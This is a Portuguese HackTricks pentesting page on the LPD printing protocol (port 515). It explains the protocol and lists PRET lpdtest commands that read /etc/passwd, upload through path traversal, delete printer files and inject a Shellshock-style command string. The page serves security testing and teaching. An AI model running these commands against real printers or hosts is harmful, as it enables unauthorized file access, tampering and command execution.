mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-20 10:03:51 +00:00
47 lines
3.7 KiB
Markdown
47 lines
3.7 KiB
Markdown
<details>
|
|
|
|
<summary><strong>Aprenda hacking no AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras formas de apoiar o HackTricks:
|
|
|
|
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|
|
|
|
|
|
O protocolo Line Printer Daemon (LPD) foi originalmente introduzido no Berkeley Unix nos anos 80 (posteriormente especificado pelo RFC1179).\
|
|
O daemon é executado na porta 515/tcp e pode ser acessado usando o comando `lpr`. Para imprimir, o cliente envia um **arquivo de controle** definindo o trabalho/usuário e um **arquivo de dados** contendo os dados reais a serem impressos. O **tipo de entrada** do arquivo de dados pode ser definido no arquivo de controle escolhendo entre **vários formatos de arquivo**. No entanto, cabe à implementação do LPD como realmente lidar com os dados de impressão. Uma implementação popular do LPD para sistemas operacionais semelhantes ao Unix é o LPRng. O LPD pode ser usado como um meio para implantar **trabalhos de impressão maliciosos em PostScript** ou **PJL**.
|
|
|
|
As ferramentas `lpdprint` e `lpdtest` estão incluídas no [**PRET**](https://github.com/RUB-NDS/PRET)**.** Elas são uma maneira minimalista de imprimir dados diretamente em uma impressora compatível com LPD ou baixar/upload/excluir arquivos e mais:
|
|
```
|
|
lpdprint.py hostname filename
|
|
lpdtest.py hostname get /etc/passwd
|
|
lpdtest.py hostname put ../../etc/passwd
|
|
lpdtest.py hostname rm /some/file/on/printer
|
|
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
|
|
lpdtest.py hostname mail lpdtest@mailhost.local
|
|
```
|
|
Se você quer aprender mais sobre [**hackear impressoras leia esta página**](pentesting-printers/).
|
|
|
|
# Shodan
|
|
|
|
* `porta 515`
|
|
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras formas de apoiar o HackTricks:
|
|
|
|
* Se você quer ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**material oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
|
|
* **Junte-se ao grupo** 💬 [**Discord**](https://discord.gg/hRep4RUj7f) ou ao grupo [**telegram**](https://t.me/peass) ou **siga**-me no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Compartilhe suas técnicas de hacking enviando PRs para os repositórios github do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|